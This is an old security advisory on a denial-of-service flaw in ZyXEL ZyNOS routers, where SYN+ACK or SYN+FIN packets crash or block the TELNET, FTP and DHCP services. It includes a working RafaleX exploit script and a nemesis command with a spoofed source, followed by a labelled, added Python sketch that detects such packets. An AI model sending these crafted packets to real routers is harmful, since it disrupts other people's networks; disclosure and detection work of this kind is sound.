18th Jun 2002 [SBWID-5462]
COMMAND
ZyXEL ZyNOS remote service DoS
SYSTEMS AFFECTED
ZyXEL 642R(-11) AJ.6 and other routers based on ZyNOS
PROBLEM
Ueli Kistler [iuk@gmx.ch] of eclipse
[http://www.packx.net][http://www.eclipse.fr.fm], says:
A ZyXEL router service can be crashed by sending a packet with TCP
flags ACK and SYN set at the same time. The service will not be
available even through RS-232. Using a SYN-FIN packet will make
the service port inaccessible for a few minutes.
Affected services on ZyXEL 642R-11 are: TELNET, FTP and DHCP (if
enabled). TELNET and FTP cannot be deactivated.
Exploit
-------
# This is a RafaleX script (Download: www.packx.net)
# Rafale X script
# ---------------
# Action : Make a ZyXEL 642R Prestige Router inaccessible on port 23
#
%name=ZyXEL telnet service DoS
%category=Denial of service
%date=23-05-2002
%rafalemin=0.2
%description=Crash ZyXEL router telnet service with ACK and SYN flag
// Variables
$done=Target attacked...
// Do the stuff...
!Display=Please wait...
!Sleep 500
PORTDST=23
IPHEADERSIZE=20
ACK=1
SYN=1
!Display=Sending the packet...
!SEND 1 TCP
!Sleep 200
!Display=ACK/SYN Packet sent! ZyXEL telnet service crashed (V2.50(AJ.6))
!Sleep 1000
!Display=$done
NOTE: Also set these values. Rafale used these by default: ACK=0,
SEQ=0, WIN=0
Example with nemesis:
nemesis-tcp -v -S %spoofed IP possible% -D %ZyXEL router% -fS -fA -w 0 -s 0 -a 0 -y 23
SOLUTION
None yet
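Detection sketch (an added example, not part of the original advisory or of any ZyXEL or RafaleX code): a stateless check that flags the SYN+ACK and SYN+FIN packets described above when they are addressed to the TELNET or FTP port. The default ports 21 and 23, the function names and the sample addresses are assumptions made for illustration.

```python
import socket
import struct

# TCP flag bits (RFC 793)
FIN, SYN, ACK = 0x01, 0x02, 0x10
# Assumption: TELNET and FTP, the services named in the advisory, on default ports
WATCHED_PORTS = {21, 23}


def classify(packet: bytes):
    """Return a finding for a raw IPv4 packet, or None if nothing stands out."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    frag_offset = struct.unpack("!H", packet[6:8])[0] & 0x1FFF
    if packet[9] != 6 or frag_offset or len(packet) < ihl + 20:
        return None  # not TCP, not a first fragment, or truncated
    src = socket.inet_ntoa(packet[12:16])
    _sport, dport, seq, ack, off_flags, win = struct.unpack(
        "!HHIIHH", packet[ihl:ihl + 16])
    flags = off_flags & 0x3F
    if dport not in WATCHED_PORTS:
        return None
    if flags & SYN and flags & FIN:
        return f"SYN+FIN from {src} to port {dport}"
    if flags & SYN and flags & ACK:
        # A listening service never opens a connection from its own port,
        # so a SYN+ACK addressed to that port answers nothing it sent.
        note = " (seq=0 ack=0 win=0)" if (seq, ack, win) == (0, 0, 0) else ""
        return f"SYN+ACK from {src} to port {dport}{note}"
    return None


def build(src, dst, sport, dport, flags, seq=0, ack=0, win=0):
    """Constructed sample input: bare IPv4+TCP headers, checksums left at 0."""
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, ack,
                      (5 << 12) | flags, win, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return ip + tcp


if __name__ == "__main__":
    # Constructed packets using documentation address ranges (RFC 5737)
    for f in (SYN | ACK, SYN | FIN, SYN):
        print(classify(build("198.51.100.7", "192.0.2.1", 40000, 23, f)))
```

The same test can sit in front of the router as a filter rule: both flag combinations can be dropped at the upstream device without affecting ordinary connections to those ports.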